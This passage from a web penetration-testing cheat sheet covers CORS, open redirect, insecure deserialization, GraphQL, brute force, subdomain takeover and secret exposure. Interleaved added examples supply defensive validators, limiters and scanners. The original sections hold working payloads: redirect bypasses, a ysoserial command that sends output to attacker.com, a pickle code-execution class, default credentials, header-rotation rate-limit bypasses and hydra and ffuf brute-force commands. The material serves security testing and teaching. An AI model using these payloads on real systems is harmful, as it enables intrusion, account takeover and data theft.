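    if "@" in parts.netloc or parts.hostname is None:
        return None
    normalized = "https://" + parts.netloc.lower()
    return normalized if normalized in ALLOWED_ORIGINS else None

def cors_headers(origin, check=strict_origin_check):
    """Headers to add to a credentialed API response for the given Origin header."""
    allowed = check(origin)
    if allowed is None:
        return {}                          # no ACAO header at all: the browser blocks the read
    return {
        "Access-Control-Allow-Origin": allowed,
        "Access-Control-Allow-Credentials": "true",
        "Vary": "Origin",                  # caches must not serve one origin's answer to another
    }
```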
Tools
Burp Suite, CORSy, cors-poc.py
Impact
- Sensitive data theft from authenticated sessions
- Account takeover via CSRF-like attacks
References
23
SECURITY MISCONFIGURATION
Exposed admin panels, default credentials, unnecessary services, missing security headers.
Checklist
// 1. Missing Security Headers (check with curl -I):
Strict-Transport-Security (HSTS)
Content-Security-Policy (CSP)
X-Frame-Options
X-Content-Type-Options
Referrer-Policy
Permissions-Policy
X-XSS-Protection
// 2. Exposed admin interfaces
/admin
/phpmyadmin
/wp-admin
/manager (Tomcat)
/actuator (Spring Boot - exposes /actuator/env, /actuator/heapdump)
/console (JBoss/WebLogic)
/.git/ (source code exposure)
/.env (environment variables)
/swagger-ui.html (API docs exposure)
/api-docs
/graphql (introspection enabled)
// 3. Default credentials
admin:admin (phpMyAdmin, routers)
tomcat:tomcat (Tomcat manager)
admin:password (various)
elastic: (Elasticsearch no auth)
// 4. Directory listing enabled
// Check: response contains "Index of /"
// 5. Sensitive files
robots.txt (may reveal hidden paths)
sitemap.xml
crossdomain.xml
.htaccess
backup.zip / backup.tar.gz
/WEB-INF/web.xml
/META-INF/
HTTP Security Headers Test
curl -I https://target.com
# OR use:
securityheaders.com
observatory.mozilla.org
Tools
Nikto, Nmap, gobuster, ffuf, nuclei
nikto -h https://target.com
nuclei -u https://target.com -t misconfiguration/
gobuster dir -u https://target.com -w /usr/share/wordlists/dirb/common.txt
Impact
- Information disclosure
- Admin access via defaults
- Source code theft
- XSS via missing CSP
References
24
OPEN REDIRECT
Application redirects users to attacker-controlled URLs via unvalidated redirect parameters.
Where to Test
- ?next=URL
- ?redirect=URL
- ?url=URL
- ?return=URL
- ?goto=URL
- ?dest=URL
- Login callbacks
Payloads
// Basic
?next=https://attacker.com
?redirect=//attacker.com
?url=https://attacker.com
// Bypass whitelisting
?url=https://target.com.attacker.com
?url=https://attacker.com?target.com
?url=https://target.com@attacker.com
?url=https://attacker.com/target.com
?url=\/\/attacker.com
?url=%2F%2Fattacker.com
?url=%5C%5Cattacker.com
?url=https:%252F%252Fattacker.com
?url=javascript:alert(1) // for XSS
?url=data:text/html,<script>alert(1)</script>
// Protocol-relative (browser resolves to https or http)
?url=//attacker.com
// CRLF + redirect
?url=https://attacker.com%0d%0aLocation:https://evil.com
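A redirect validator that rejects every payload in the list above, shown beside the naive check those payloads are written against, as an added example that is not part of the original page. The host allowlist is constructed; `target.com` is the page's placeholder.

```python
from urllib.parse import urlsplit, unquote

ALLOWED_HOSTS = {"target.com", "www.target.com"}   # constructed allowlist for the example

def naive_is_safe(url):
    """The check the bypass list above is written against."""
    return url.startswith("/") or "target.com" in url

def safe_redirect_target(url, default="/"):
    """Return url if it stays on this site, otherwise the default landing page."""
    # Undo double encoding (https:%252F%252F) and map backslashes to slashes,
    # since browsers treat '\' as '/' in http(s) URLs.
    candidate = unquote(unquote(url)).replace("\\", "/").strip()
    # CR/LF or other control characters would let the value split the Location header.
    if any(ord(c) < 32 or ord(c) == 127 for c in candidate):
        return default
    parts = urlsplit(candidate)
    if not parts.scheme and not parts.netloc:
        # Site-relative path: exactly one leading slash ('//host' is protocol-relative).
        if candidate.startswith("/") and not candidate.startswith("//"):
            return candidate
        return default
    if parts.scheme not in ("http", "https"):       # javascript:, data:, and bare '//host'
        return default
    host = parts.hostname                           # drops userinfo (target.com@attacker.com) and port
    if host is None or host.lower() not in ALLOWED_HOSTS:
        return default
    return candidate
```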
Chaining with Other Attacks
Open Redirect + OAuth: Used to steal OAuth authorization codes via redirect_uri bypass
Open Redirect + SSRF: Chain with SSRF if server follows redirects
Tools
Burp Suite, OpenRedireX
Impact
- Phishing attacks
- OAuth token theft
- SSRF chaining
References
25
INSECURE DESERIALIZATION
Deserializing attacker-controlled data triggers RCE via gadget chains in known libraries.
Indicators of Serialized Data
// Java: starts with rO0AB... (base64) or 0xACED0005 (hex)
// PHP: O:4:"User":1:{s:4:"name";s:5:"admin";}
// Python: base64 encoded pickle
// .NET: AAEAAAD.../BinaryFormatter
// JSON with type information: {"@type":"java.lang.Class"}
// ViewState: __VIEWSTATE parameter
PHP Deserialization
// Test with modified object:
O:4:"User":2:{s:4:"name";s:5:"admin";s:4:"role";s:5:"admin";}
// Magic method abuse: __wakeup, __destruct, __toString
// Craft objects that call dangerous functions on deserialization
Java Deserialization
// Use ysoserial to generate gadget chain payloads:
java -jar ysoserial.jar CommonsCollections1 "id" | base64
java -jar ysoserial.jar CommonsCollections6 "curl http://attacker.com/$(id)" | base64
java -jar ysoserial.jar Spring1 "id" | base64
// Send as body or cookie where Java objects are consumed
Python Pickle
import pickle, os, base64
class Exploit(object):
    def __reduce__(self):
        return (os.system, ('id',))
payload = base64.b64encode(pickle.dumps(Exploit())).decode()
# Send as cookie or POST param
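How a consumer stops the `__reduce__` gadget above before it runs, as an added example (not from the original page): a restricted `Unpickler` whose `find_class` allowlists globals, the pattern the Python `pickle` documentation describes. The allowlist is constructed, and `Gadget` mirrors the page's `Exploit` class with `os.getpid` in place of `os.system` so the demonstration has no side effect.

```python
import io
import os
import pickle
from collections import OrderedDict

# Constructed allowlist: the only globals a stored session/cache object may name.
SAFE_GLOBALS = {("collections", "OrderedDict"), ("builtins", "set"), ("builtins", "frozenset")}

class RestrictedUnpickler(pickle.Unpickler):
    """find_class is consulted for every GLOBAL/STACK_GLOBAL opcode before the
    referenced callable is invoked, so a __reduce__ payload naming os.system
    is rejected before anything executes."""
    def find_class(self, module, name):
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError("forbidden global %s.%s" % (module, name))

def restricted_loads(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()

class Gadget:
    """Same shape as the Exploit class above; os.getpid stands in for os.system
    so the demonstration has no side effect even if mis-loaded."""
    def __reduce__(self):
        return (os.getpid, ())

def try_load(data):
    """Return ('ok', obj) when the payload only uses allowlisted globals, else ('blocked', why)."""
    try:
        return "ok", restricted_loads(data)
    except pickle.UnpicklingError as exc:
        return "blocked", str(exc)
```

Allowlisting is a mitigation for data you must keep in pickle form; the stronger fix is to never unpickle untrusted input at all and use a data-only format such as JSON.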
.NET ViewState
// If MachineKey is known or default:
ysoserial.net -g TypeConfuseDelegate -f LosFormatter -c "cmd /c whoami" | base64
Tools
ysoserial, ysoserial.net, Burp Suite, freddy (Burp ext)
Impact
- Remote Code Execution
- Authentication bypass
- Privilege escalation
References
26
BUSINESS LOGIC FLAWS
Exploiting application logic to perform unintended actions (price manipulation, workflow bypass).
Test Scenarios
// 1. Price Manipulation
// Modify price/quantity in POST body before checkout
// price=100 → price=-100 (negative price = credit)
// quantity=1 → quantity=-1
// Apply coupon multiple times
// 2. Workflow Step Bypass
// Skip payment step: go directly from cart to /order-confirmed
// Replay POST without payment verification
// Modify order status in request
// 3. Coupon/Promo Abuse
// Apply same coupon repeatedly
// Apply multiple conflicting discounts
// Use expired coupon with modified date
// 4. Race Condition
// Double-spend by sending concurrent requests
// Two simultaneous "withdraw" API calls
// Use Burp Repeater → send group in parallel
// 5. Limit Bypass
// Transfer more than account balance
// Integer overflow: quantity=9999999999 (overflow to small number)
// Submit form with negative values
// 6. Privilege Escalation
// Change role=user to role=admin in API call
// Modify account_type=premium in request
// 7. Two-Factor Auth Skip
// Complete first step, directly access post-2FA URL
// 8. Mass Assignment
// Extra JSON fields in profile update:
// {"name":"test","is_admin":true,"credits":9999}
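The race condition from scenario 4 above reproduced deterministically, with the check-then-act version beside one where the check and the debit are a single atomic step, as an added example that is not from the original page. The barrier is a constructed device that forces both requests past the balance check before either debits; in a real service the same window is opened by two requests arriving together.

```python
import threading

class NaiveAccount:
    """Check, then debit, with nothing tying the two together. The debit itself is
    atomic (like a single UPDATE statement), which is why the code looks safe."""
    def __init__(self, balance):
        self.balance = balance
        self._write = threading.Lock()

    def withdraw(self, amount, rendezvous=None):
        if self.balance < amount:          # SELECT balance ... (no lock held)
            return False
        if rendezvous is not None:
            rendezvous.wait()              # constructed: every request passes the check first
        with self._write:                  # UPDATE accounts SET balance = balance - :amount
            self.balance -= amount
        return True

class SafeAccount:
    """Check and debit under one lock; in SQL the equivalent is SELECT ... FOR UPDATE,
    or UPDATE ... SET balance = balance - :amount WHERE balance >= :amount."""
    def __init__(self, balance):
        self.balance = balance
        self._lock = threading.Lock()

    def withdraw(self, amount, rendezvous=None):
        with self._lock:
            if self.balance < amount:
                return False
            self.balance -= amount
            return True

def concurrent_withdrawals(account_cls, balance=100, amount=100, clients=2):
    """Fire `clients` simultaneous withdrawals of `amount`; return (successes, final balance).
    Callers must pick values where every client passes the initial check, otherwise
    the constructed barrier times out instead of releasing."""
    account = account_cls(balance)
    # No barrier for SafeAccount: waiting inside its lock would deadlock, which is
    # itself the point, since the lock serialises the whole check-and-debit.
    gate = threading.Barrier(clients, timeout=2) if account_cls is NaiveAccount else None
    results = []
    def attempt():
        results.append(account.withdraw(amount, gate))
    threads = [threading.Thread(target=attempt) for _ in range(clients)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return sum(results), account.balance
```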
Tools
Burp Suite, Manual Analysis, Turbo Intruder (race)
Impact
- Financial fraud
- Privilege escalation
- Data integrity violation
References
27
GRAPHQL INJECTION
Exploiting GraphQL APIs via introspection, injection, and authorization flaws.
Discovery
// Common GraphQL endpoints:
/graphql
/api/graphql
/graphiql
/v1/graphql
/query
Introspection (Enumerate Schema)
// Full introspection query:
{"query": "{ __schema { queryType { name } types { name fields { name type { name } } } } }"}
// Simple type listing:
{"query": "{__schema{types{name}}}"}
// Get all queries:
{"query": "{__schema{queryType{fields{name description}}}}"}
// Bypass disabled introspection:
{"query": "{__schema\n{queryType{name}}}"} // newline bypass
{"query": "{ __type(name: \"Query\") { fields { name } } }"} // __type still works
Exploitation Payloads
// IDOR via GraphQL
{"query": "{ user(id: 2) { email password } }"}
{"query": "{ order(id: 12345) { total address } }"}
// Batch query abuse (DoS / auth bypass)
[{"query":"{user{id email}}"},{"query":"{user{id email}}"},...] // repeat 100x
// Mutation abuse
{"query": "mutation { updateUser(id:2, role:\"admin\") { id role } }"}
// SQL/NoSQL injection inside GraphQL args
{"query": "{ user(name: \"' OR 1=1--\") { email } }"}
// Field suggestion abuse - typo reveals real fields
{"query": "{ usr { email } }"} // response suggests "user"
// Alias batching to bypass rate limit
{"query": "{ a:login(user:\"admin\",pass:\"1\") b:login(user:\"admin\",pass:\"2\") }"}
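A pre-execution shape check for the introspection, nesting and alias-batching abuses above, as an added example that is not part of the original page. It works on the raw query text with constructed limits; a production resolver layer would apply the same limits through the GraphQL server's validation rules rather than regexes.

```python
import re

def strip_literals_and_arguments(query):
    """Blank string literals, then delete parenthesised argument lists innermost-first,
    so that user:"admin" inside login(...) cannot be mistaken for an alias."""
    q = re.sub(r'"(?:\\.|[^"\\])*"', '""', query)
    previous = None
    while previous != q:
        previous, q = q, re.sub(r"\([^()]*\)", "", q)
    return q

def analyse_query(query, max_depth=6, max_aliases=5, allow_introspection=False):
    """Return {'depth', 'aliases', 'introspection', 'reasons'}; empty reasons means accept.
    Alias batching (rate-limit bypass) and deep nesting are rejected on shape alone,
    before any resolver runs. Batched JSON arrays need a separate per-request cap."""
    q = strip_literals_and_arguments(query)
    depth = current = 0
    for ch in q:
        if ch == "{":
            current += 1
            depth = max(depth, current)
        elif ch == "}":
            current -= 1
    # After stripping, the only remaining "name : name" pairs are aliases.
    aliases = len(re.findall(r"\b\w+\s*:\s*\w+", q))
    # __typename is legitimate; __schema and __type (with a newline or not) are introspection.
    introspection = re.search(r"__schema|__type\b", q) is not None
    reasons = []
    if current != 0:
        reasons.append("unbalanced braces")
    if depth > max_depth:
        reasons.append("depth %d > %d" % (depth, max_depth))
    if aliases > max_aliases:
        reasons.append("aliases %d > %d" % (aliases, max_aliases))
    if introspection and not allow_introspection:
        reasons.append("introspection disabled")
    return {"depth": depth, "aliases": aliases, "introspection": introspection, "reasons": reasons}
```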
Tools
GraphQL Voyager, InQL (Burp), Altair, clairvoyance
References
28
RATE LIMITING / BRUTE FORCE
Absence of rate limiting enables brute-force of credentials, OTPs, and API keys.
Where to Test
- Login endpoint
- OTP / 2FA codes
- Password reset tokens
- API keys
- Captcha bypass
Techniques
// 1. Basic brute force - no lockout
POST /login → 1000 requests with password list
// 2. Rate limit bypass via headers
X-Forwarded-For: 1.1.1.1 → rotate IP each request
X-Real-IP: 2.2.2.2
X-Originating-IP: 3.3.3.3
CF-Connecting-IP: 4.4.4.4
// 3. Rate limit bypass via null byte in username
username=admin%00
// 4. OTP brute force (4-6 digit = 10,000-1,000,000 combinations)
// Send rapid requests with codes 0000-9999
// 5. Password spray (avoid lockout)
// Try 1 password against all users → rotate
// 6. Padding attack on OTP
// Change: {"otp":"1234"} to {"otp":["1234","1234",...]}
// 7. Race condition on OTP
// Submit correct OTP in parallel → bypass single-use limit
// 8. Username enumeration via timing
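A limiter that is immune to techniques 2 and 3 above (header rotation and null-byte username variants) because its buckets are keyed on the normalised account name and the socket peer, never on client-supplied headers; this is an added example, not from the original page. The request dict, limits and addresses are constructed for the demonstration.

```python
import time
from collections import defaultdict, deque

class LoginLimiter:
    """Sliding-window counters keyed on the normalised account name and on the
    socket peer address. X-Forwarded-For, X-Real-IP and similar headers are
    never part of the key, so rotating them changes nothing."""
    def __init__(self, per_user=5, per_peer=20, window=60.0, clock=time.monotonic):
        self.limits = {"user": per_user, "peer": per_peer}
        self.window, self.clock = window, clock
        self._hits = defaultdict(deque)

    @staticmethod
    def normalise_user(raw):
        # admin, ADMIN, ' admin' and admin%00 (URL-decoded to a NUL) share one bucket.
        return raw.split("\x00")[0].strip().lower()

    def allow(self, request):
        """request is a constructed dict: {'peer': ip, 'headers': {...}, 'form': {...}}."""
        now = self.clock()
        keys = [("user", self.normalise_user(request["form"].get("user", ""))),
                ("peer", request["peer"])]
        for key in keys:
            q = self._hits[key]
            while q and now - q[0] >= self.window:
                q.popleft()
            if len(q) >= self.limits[key[0]]:
                return False                 # denied attempts are not counted, only logged
        for key in keys:
            self._hits[key].append(now)
        return True

def rotating_header_attempts(limiter, n=6):
    """Constructed replay of the header-rotation trick above: n attempts on 'admin',
    each with a fresh X-Forwarded-For and a different spelling of the username."""
    spellings = ["admin", "ADMIN", "admin\x00", " admin", "Admin", "admin"]
    outcomes = []
    for i in range(n):
        req = {"peer": "203.0.113.7",
               "headers": {"X-Forwarded-For": "1.1.1.%d" % (i + 1)},
               "form": {"user": spellings[i % len(spellings)], "pass": "guess%d" % i}}
        outcomes.append(limiter.allow(req))
    return outcomes
```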
Common Wordlists
// Passwords:
rockyou.txt, SecLists/Passwords/Common-Credentials/
10-million-password-list-top-100.txt
// Usernames:
SecLists/Usernames/Names/names.txt
Tools
Hydra, Burp Intruder, ffuf, Medusa, Turbo Intruder
hydra -L users.txt -P pass.txt target.com http-post-form "/login:user=^USER^&pass=^PASS^:Invalid"
ffuf -w passwords.txt -X POST -d "user=admin&pass=FUZZ" -u https://target.com/login -fc 401
Impact
- Account takeover via credential brute-force
- OTP/2FA bypass
- API key enumeration
References
29
SUBDOMAIN TAKEOVER
Claiming dangling DNS records pointing to unclaimed third-party services.
How It Works
Mechanism
1. target.com has: sub.target.com CNAME service.github.io
2. GitHub Pages project deleted / unclaimed
3. Attacker creates GitHub Pages project at service.github.io
4. sub.target.com now serves attacker content
Detection
// Step 1: Enumerate subdomains
subfinder -d target.com -o subs.txt
amass enum -d target.com -o subs.txt
assetfinder target.com
// Step 2: Check for dangling CNAME
for sub in $(cat subs.txt); do
dig $sub CNAME +short
done
// Step 3: Check if CNAME target is claimable
// Error indicators per service:
// GitHub Pages: "There isn't a GitHub Pages site here"
// Heroku: "No such app"
// Fastly: "Fastly error: unknown domain"
// Shopify: "Sorry, this shop is currently unavailable"
// AWS S3: "NoSuchBucket"
// Zendesk: "Help Center Closed"
Vulnerable Service Fingerprints
GitHub Pages: "There isn't a GitHub Pages site here"
Heroku: "No such app"
AWS S3: "NoSuchBucket"
Fastly: "Fastly error: unknown domain"
Azure: "404 Web Site not found"
Shopify: "Sorry, this shop is currently unavailable"
Pantheon: "404 error unknown site"
Surge.sh: "project not found"
Tumblr: "Whatever you were looking for doesn't currently exist"
Tools
subjack, nuclei, takeover, subfinder, subzy
subjack -w subs.txt -t 100 -timeout 30 -ssl -c ~/fingerprints.json
subzy run --targets subs.txt
Impact
- Cookie theft (same-origin on subdomain)
- Phishing via trusted subdomain
- XSS via subdomain
- Malware hosting
References
30
SENSITIVE DATA EXPOSURE
Unintentional exposure of credentials, keys, PII through misconfiguration or verbose responses.
Where to Look
// Source Code / JS Files
// Search for keywords in JS bundles:
api_key, apikey, secret, password, token, auth,
AWS_ACCESS, PRIVATE_KEY, bearer, passwd, credential
// Common files to check:
/.env
/.git/config
/config.php
/database.yml
/settings.py
/application.properties
/wp-config.php
/web.config
/appsettings.json
/config/database.yml
/package.json (may expose internal module names)
// Error messages
// Verbose stack traces with DB connection strings
// Internal server paths in error messages
// API Responses
// Returning sensitive fields: SSN, card numbers, passwords (hashed or plain)
// Extra fields in JSON not shown in UI
// Backup / old files
/index.php.bak
/config.php~
/admin.php.old
/backup.sql
// Comment in HTML source
<!-- DB: mysql://root:password@localhost/app -->
<!-- TODO: remove test API key: sk-prod-abc123 -->
// Google Dorks
site:target.com filetype:sql
site:target.com filetype:log
site:target.com "DB_PASSWORD"
site:pastebin.com target.com
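A small secret scanner run over constructed JS and HTML fragments shaped like the findings listed above (hard-coded keys in bundles, credentials in HTML comments), as an added example that is not part of the original page. The rule set is constructed and far narrower than trufflehog's or gitleaks'; every sample value is a documented placeholder or made up.

```python
import re

# Constructed samples: a bundle fragment and an HTML page with planted fake secrets.
SAMPLE_FILES = {
    "app.bundle.js": """\
const API_BASE = "https://api.target.com/v1";
const STRIPE_KEY = "sk_live_EXAMPLE0000000000000000";   // constructed placeholder
var awsAccessKey = "AKIAIOSFODNN7EXAMPLE";               // AWS documentation example key
fetch(API_BASE + "/me", {headers: {Authorization: "Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiIxIn0.c2lnbmF0dXJl"}});
""",
    "index.html": """\
<!-- DB: mysql://root:password@localhost/app -->
<!-- TODO: remove test API key: sk-prod-abc123 -->
<script src="app.bundle.js"></script>
""",
}

SECRET_RULES = [
    ("aws-access-key-id", re.compile(r"\bAKIA[0-9A-Z]{16}\b")),
    ("stripe-secret-key", re.compile(r"\bsk_(?:live|test)_[0-9A-Za-z]{20,}\b")),
    ("jwt", re.compile(r"\beyJ[A-Za-z0-9_-]{8,}\.[A-Za-z0-9_-]{8,}\.[A-Za-z0-9_-]{4,}")),
    ("connection-string", re.compile(r"\b[a-z][a-z0-9+.-]*://[^\s:@/]+:[^\s@/]+@[^\s\"'<>]+")),
    # Generic "keyword = value" rule; group 1 is the value so it can be masked.
    ("keyword-assignment", re.compile(
        r"(?i)\b(?:api[ _-]?key|secret|token|password|passwd)\b\s*[:=]\s*[\"']?([^\s\"'<>,;]{6,})")),
]

def mask(value):
    """Never write the full secret into the report; keep a prefix and the length."""
    return value[:4] + "..." + "(%d chars)" % len(value)

def scan_text(name, text):
    """Return (file, line number, rule, masked value) for every rule hit."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for rule, rx in SECRET_RULES:
            for m in rx.finditer(line):
                value = m.group(m.lastindex or 0)   # capturing group if the rule has one
                findings.append((name, lineno, rule, mask(value)))
    return findings

def scan_files(files):
    out = []
    for name, text in files.items():
        out.extend(scan_text(name, text))
    return out
```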
Tools
truffleHog, gitrob, gitleaks, gospider, LinkFinder
trufflehog git https://github.com/target/repo
gitleaks detect --source . --report-path=report.json
linkfinder.py -i https://target.com -d # Extract JS endpoints/secrets
Impact
- Credential/API key theft
- Database access
- PII exposure (GDPR violation)
- Full account/system compromise
References